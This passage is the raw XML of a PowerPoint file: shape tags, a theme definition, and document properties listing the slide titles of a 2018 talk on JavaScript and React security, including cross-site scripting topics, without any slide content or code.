  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag46.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag47.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag48.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag49.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag50.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag51.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag52.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag53.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag54.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag55.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag56.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag57.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag58.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag59.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-TEMPLATE-001" val="12/13/2015 5:23:58 PM"/>
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag60.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag61.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag62.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag63.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag64.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag65.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag66.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag67.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag68.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag69.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-TEMPLATE-001" val="12/19/2015 4:31:23 PM"/>
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag70.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag71.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag72.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag73.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag74.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag75.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag76.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag77.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag78.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-TEMPLATE-001" val="12/24/2015 3:32:09 PM"/>
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-TEMPLATE-001" val="1/6/2016 2:39:37 PM"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Default Theme">
  <a:themeElements>
    <a:clrScheme name="Default Theme">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="4F2683"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="F69008"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="46AA42"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="C41300"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="BCBCBC"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="0072AC"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0000FF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="800080"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Default Theme">
      <a:majorFont>
        <a:latin typeface="Arial" panose="020B0604020202020204"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
        <a:font script="Jpan" typeface="メイリオ"/>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メイリオ"/>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800" dirty="0"/>
        </a:defPPr>
      </a:lstStyle>
      <a:style>
        <a:lnRef idx="2">
          <a:schemeClr val="accent1">
            <a:shade val="50000"/>
          </a:schemeClr>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:schemeClr val="accent1"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </a:style>
    </a:spDef>
    <a:lnDef>
      <a:spPr>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800" dirty="0"/>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Default Theme" id="{6D1F9C5A-2AEA-433E-9F31-B7D4577B66E9}" vid="{EBCC1F61-21FD-4864-9BE9-BDE6511C7A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5322</TotalTime>
  <Words>1837</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>384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Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Default Theme</vt:lpstr>
      <vt:lpstr>How to                      to JavaScript [In]Security</vt:lpstr>
      <vt:lpstr>whoami</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>State of the Client-Side JavaScript Field Today</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Frameworks, what about them?</vt:lpstr>
      <vt:lpstr>Client-side JavaScript Security Concerns</vt:lpstr>
      <vt:lpstr>Server-side JavaScript Security Concerns</vt:lpstr>
      <vt:lpstr>Align Client-Side JavaScript with OWASP Top 10 </vt:lpstr>
      <vt:lpstr>JavaScript Frameworks Security</vt:lpstr>
      <vt:lpstr>React</vt:lpstr>
      <vt:lpstr>Why React?</vt:lpstr>
      <vt:lpstr>React History</vt:lpstr>
      <vt:lpstr>React Overview</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Expression Injection vs Component Injection</vt:lpstr>
      <vt:lpstr>Dynamically Created Components – Part I</vt:lpstr>
      <vt:lpstr>Dynamically Created Components – Part II</vt:lpstr>
      <vt:lpstr>Attribute Injections</vt:lpstr>
      <vt:lpstr>XSS via JavaScript URI Demo</vt:lpstr>
      <vt:lpstr>XSS with Markdown </vt:lpstr>
      <vt:lpstr>XSS with Markdown Demo</vt:lpstr>
      <vt:lpstr>Server Side Rendering</vt:lpstr>
      <vt:lpstr>Server Side Rendering</vt:lpstr>
      <vt:lpstr>XSS with Server Side Rendering Demo</vt:lpstr>
      <vt:lpstr>XSS in Redux</vt:lpstr>
      <vt:lpstr>Eval… Again?</vt:lpstr>
      <vt:lpstr>Communicating with Server</vt:lpstr>
      <vt:lpstr>Request Authentication</vt:lpstr>
      <vt:lpstr>Leaking Sensitive Data into localStorage</vt:lpstr>
      <vt:lpstr>Conclusions and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Ksenia Peguero</dc:creator>
  <cp:lastModifiedBy>Ksenia Peguero</cp:lastModifiedBy>
  <cp:revision>391</cp:revision>
  <cp:lastPrinted>2018-03-28T15:49:32Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-01-18T19:13:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-21T15:19:35Z</dcterms:modified>
</cp:coreProperties>
</file>